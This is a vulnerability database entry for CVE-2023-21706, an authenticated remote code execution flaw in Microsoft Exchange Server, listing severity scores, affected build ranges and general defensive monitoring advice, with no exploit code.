cbcvebase.
CVE-2023-21706
published 2023-02-14

CVE-2023-21706: Microsoft Exchange Server Remote Code Execution Vulnerability

PriorityP260high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EPSS
4.06%
89.4th percentile
Microsoft Exchange Server Remote Code Execution Vulnerability

Affected

11 ranges
VendorProductVersion rangeFixed in
microsoftexchange_server
microsoftexchange_server
microsoftexchange_server
microsoftmicrosoft_exchange_server_2013_cumulative_update_23>= 15.00.0 < 15.00.1497.04715.00.1497.047
microsoftmicrosoft_exchange_server_2016_cumulative_update_23>= 15.01.0 < 15.01.2507.02115.01.2507.021
microsoftmicrosoft_exchange_server_2019_cumulative_update_11>= 15.02.0 < 15.02.0986.04115.02.0986.041
microsoftmicrosoft_exchange_server_2019_cumulative_update_12>= 15.02.0 < 15.02.1118.02515.02.1118.025
msrcmicrosoft_exchange_server_2013_cumulative_update_23
msrcmicrosoft_exchange_server_2016_cumulative_update_23
msrcmicrosoft_exchange_server_2019_cumulative_update_11
msrcmicrosoft_exchange_server_2019_cumulative_update_12

Detection & IOCsextracted from sources · hover to see the quote

  • Monitor for authenticated network calls to Exchange Server that attempt to trigger remote code execution in the context of the server account; attacker must be authenticated (low privilege) and attack vector is network with no user interaction required.
  • Watch for SSRF bypass attempts against Exchange web application firewall signatures, as attackers may attempt to bypass SSRF protections (similar to ProxyNotShell CVE-2022-41082) to meet the authentication constraints needed to exploit CVE-2023-21706.
  • Monitor Exchange servers for credential brute-force activity, as attackers may attempt to brute-force Exchange credentials to satisfy the authentication requirement for exploitation.
  • Successful exploitation results in code execution as SYSTEM on the Exchange server; alert on unexpected SYSTEM-level process spawning from Exchange worker processes.
  • ·As of the blog publication date, no public proof-of-concept exploit exists for CVE-2023-21706; exploitation is assessed as 'More Likely' by Microsoft but no in-the-wild exploitation confirmed.
  • ·Targeted attacks against self-hosted Exchange are expected to be stealthy and direct rather than mass-scanning; defenders should focus on targeted attack detection rather than mass exploitation signatures.

CVSS provenance

nvdv3.18.8HIGHCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
vendor_msrc8.8HIGH
Stop checking back — get the weekly exploitation signal.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.